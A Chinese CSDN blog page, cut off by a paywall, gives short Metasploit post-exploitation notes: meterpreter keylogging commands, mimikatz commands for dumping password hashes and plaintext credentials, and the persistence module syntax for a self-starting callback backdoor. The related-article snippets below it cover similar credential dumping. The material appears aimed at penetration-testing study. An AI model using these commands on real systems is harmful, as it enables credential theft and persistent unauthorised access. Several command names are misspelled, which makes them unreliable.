msf进阶

最新推荐文章于 2023-04-27 20:28:37 发布
最新推荐文章于 2023-04-27 20:28:37 发布
阅读量127 收藏
点赞数
文章标签: 网络安全 计算机网络 系统安全 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77147676/article/details/129730388
版权

msf进阶

在得到目标机shell后的进阶使用

键盘监听

Keyscan_strat:开启键盘记录功能

Keyscan_dump:显示捕捉到的键盘记录信息

Keyscan_stop:停止键盘记录

获取密码

在mimikatz模块,能获取目标主机的哈希和明文密码,常用命令:

以下均在msfconsole中运行

Load mimikatz:加载mimikatz

Msv:获取hash

Kerberos:获取明文密码

Widigest:获取系统账户信息

msf植入后门

由于meterpreter是仅运行于内存中的shellcode,一旦目标主机重启或更换ip,将失去目标主机的控制权,如果管理人员打上漏洞补丁,二次入侵会变得更加困难

所以metesploit提供了persistence和mstsvc等后渗透模块,通过在目标主机上安装自启动和永久服务的方式长久的控制目标主机

persistence后渗透模块:

通过启动项启动,定期回连、自动运行

Run persistence -S -U -X -i 间隔时间 -p 监听端口号 -r 目标ip地址

 

mstsvc后渗透攻击模块:

将msf

最低0.47元/天 解锁文章
WIN7永恒之蓝
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
msf 使用 hashdump 和 wce 提取 hash
发哥微课堂
01-21 1万+
0x00:介绍 msf获取 shell 后为了更方便的进行渗透测试,可获取主机的 hash 以及域的 hash,即用户的密码,存在于 c 盘下的 windos 下的 system32 下的 config 下的 sam 文件中,以 hash 加密的方式存储,而系统开机后,hash 密码会以明文存在于内存中,获取 hash 的工具和方法有很多,这一节记录下 hashdump 和 wce 的使用。...
3.6 Meterpreter 键盘记录
qq_55202378的博客
07-23 3418
meterpreter
『渗透基础』Cobalt Strike基础使用入门_Cobalt Strike联动msfconsole
Ho1aAs‘s Blog
06-21 984
首先给cs文件夹权限 启动cs服务器,,自定义密码,ip填公网/局域网,不可填127.0.0.1 默认端口50050 这里由于直接在服务器上面开客户端,所以可以填127.0.0.1,最好还是填局域网IP选择克隆网站 克隆目标网站作为钓鱼,勾选记录键盘 靶机访问并输入文字 即可截获输入内容先创建监听器 add一个http监听器,host选择客户端ipBeacon为内置的Listener,获取shell到CS上,Foreign为外部结合的Listener,常用于MSF的结合 创建成功攻击package有四种演示
Metasploit Framework-安全漏洞检测工具使用
最新发布
mogexiuluo的博客
04-27 4814
一款开源的安全漏洞检测工具,简称MSF。可以收集信息、探测系统漏洞、执行漏洞利用测试等,为渗透测试、攻击编码和漏洞研究提供了一个可靠平台。集成数千个漏洞利用、辅助测试模块,并保持持续更新。由著名黑客、安全专家H.D. Moore主导开发排行榜排名第二位官方网站:。在kali中,通过msfconsole进入控制台。
msfconsole后渗透指令
Yu3511606536的博客
02-26 2126
msfconsole后渗透利用
进阶课程㊷丨Apollo实战——车辆与循迹驾驶能力实战.pdf
05-04
另一种方案是 MSF(多传感器融合)的定位方式,除了 GPS 和 IMU 之外,还通过 Lidar 的 3D 点云来做认证匹配定位。 五、循迹测试的启动 设备搭建完成之后,可以通过 HMI 界面启动循迹测试,包括录制和执行两步。在...
版本控制系统进阶--使用VSTF将项目开发流程集成进来到工具当中
08-11
**版本控制系统进阶——使用VSTF将项目开发流程集成进工具当中** 版本控制系统(VSTF,Visual Studio Team Foundation)是微软提供的一款强大的项目管理工具,它将一系列成熟的开发流程集成到一个统一的环境中,帮助...
python-pentesting:python-pentesting工具
05-04
还需要安装requeriments.txt和其他模块,例如python-msfrpc 从requeriments.txt安装依赖项 点安装-r requirements.txt 介绍 该工具允许获取有关特定IP或域的信息。 它具有端口扫描等选项,并可以检测ftp或mysql等...
一份详细的 Metasploit Framework资料
01-04
三、Metasploit Framework的进阶应用 1. 自定义模块:除了使用内置模块,高级用户还可以编写自定义模块,扩展MSF的功能。 2. 情报收集:结合其他信息收集工具,如Nmap,可以进行更全面的侦查工作。 3. 隐藏与反...
战略概述与基本框架(1).pptx
10-13
最后,STI/MSF(Strategic Thinking and Management for Strategic Focusing)战略流程是战略管理的进阶方法,包含了传统的战略模型和近期的战略革新,通过环境分析和诊断,运用综合战略流程来指导企业制定和执行...
Metasploit学习笔记(六)——Meterpreter后渗透之Hash攻击提权(包含Mimikatz)
Zichel77的博客
10-09 2495
针对WIN7,还是用永恒之蓝。
【工具使用】——MSF使用_MSF中kiwi(mimikatz)模块的使用
weixin_45588247的博客
08-08 1万+
文章目录一、简介:二、前提:1. 提权到system权限:1.1 提到system有两个方法:1.2 进行提权:2. 进程迁移:三、kiwi模块的使用:1. creds_all:2. kiwi_cmd: 一、简介: kiwi模块:   mimikatz模块已经合并为kiwi模块;使用kiwi模块需要system权限,所以我们在使用该模块之前需要将当前MSF中的shell提升为system。 二、前提: 1. 提权到system权限: 1.1 提到system有两个方法:   一是当前的权限是admin
MSF中mimikatz模块的使用
谢公子的博客
11-10 3980
目录 mimikatz模块的加载 mimikatz_command模块的用法 Kerberos模块 Livessp模块 MSV模块(列出密码哈希) SSP模块 tspkg模块 Wdigest模块 mimikatz模块的加载 mimikatz模块的使用需要Administrator权限或者System权限。MSF中自带mimikatz模块,MSF中的 mimikatz 模块同时支...
渗透测试面试问题
热门推荐
w1304099880的博客
01-21 2万+
思路流程 信息收集 1.服务器的相关信息(真实ip,系统类型,版本,开放端口,WAF等) 2.网站指纹识别(包括,cms,cdn,证书等),dns记录 3.whois信息,姓名,备案,邮箱,电话反查(邮箱丢社工库,社工准备等) 4.子域名收集,旁站,C段等 5.google hacking针对化搜索,pdf文件,中间件版本,弱口令扫描等 6.扫描网站目录结构,爆后台,网站...
mimikatz使用
mirror97black的博客
04-11 6900
mimikatz使用时需要高权限,至少是administrator权限 mimikatz抓取密码的命令需要system权限,可以先进行提权 privilege::debug //提升权限(从administrator提升到system) 抓取hash sekurlsa::logonpasswords //获取当前在线用户的明文密码(需要高权限运行) lsadump::lsa ...
靶机渗透测试实战(一)——拿下shell之后的操作、SUID的解释
weixin_45116657的博客
09-25 2919
理论基础: 1、使用arp-scan -l命令进行主机扫描,确定主机ip; arp-scan是一个用来进来系统发现和指纹识别的命令行工具。它可以构建并发送ARP请求到指定的IP地址,并且显示返回的任何响应。 arp-scan是Kali Linux自带的一款ARP扫描工具。该工具可以进行单一目标扫描,也可以进行批量扫描。批量扫描的时候,用户可以通过CIDR、地址范围或者列表文件的方式指定。该工具...
win7下metasploit-framework安装及使用笔记
QQ317968200的专栏
07-01 8241
1.去官网下载最新版本的metasploit-framework2.下载好后,退出电脑的杀毒软件,因为安装的时候里面好多文件会被当做病毒删除3.点击安装,下一步下一步依次即可4.安装完成后启动,这个启动的地方我找了好久;具体启动的地方到里的安装目录下找到embedded文件夹,找到下面的mingw文件夹里面的mingw32env.cmd,双击启动,然后输入msfconsole回车即可启动5.具体使...
metasploit-学习4---windows 7下的安装
简单就是美
06-13 1万+
注意:windows7下安装metasploit程序,安装完成后有的模块依赖于其它程序,还需要安装其它程序,一些常用的功能没问题。建议还是在linux下安装,更新下载方便,再者它本身就是用ruby编写。 1.从metasploit官方网站下载此软件 下载地址:http://downloads.metasploit.com/data/releases/metasploit-latest-wi
Windows上安装Metasploit
酷狗直播-锦凡歆的博客
04-24 6229
Windows上安装Metasploit 在Windows上安装Metasploit非常简单,直接从官方下载(http://www.metasploit.com/download).安装文件进行安装即可。 作者: 锦凡歆在‘来疯’直播唱歌最好听 准备工作 Metasploit的四个版本: Pro:适用于渗透测试人员和IT安全团队 Express:适用于一般IT人...
内网MSF基础:PostgreSQL配置与权限管理教程
本篇文章主要介绍了在内网环境中使用Metasploit Framework (MSF)进行基础操作和配置的过程。MSF是一个广泛应用于渗透测试和网络安全的开源工具集,本文首先着重于如何在内网环境中设置和管理PostgreSQL数据库,因为...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值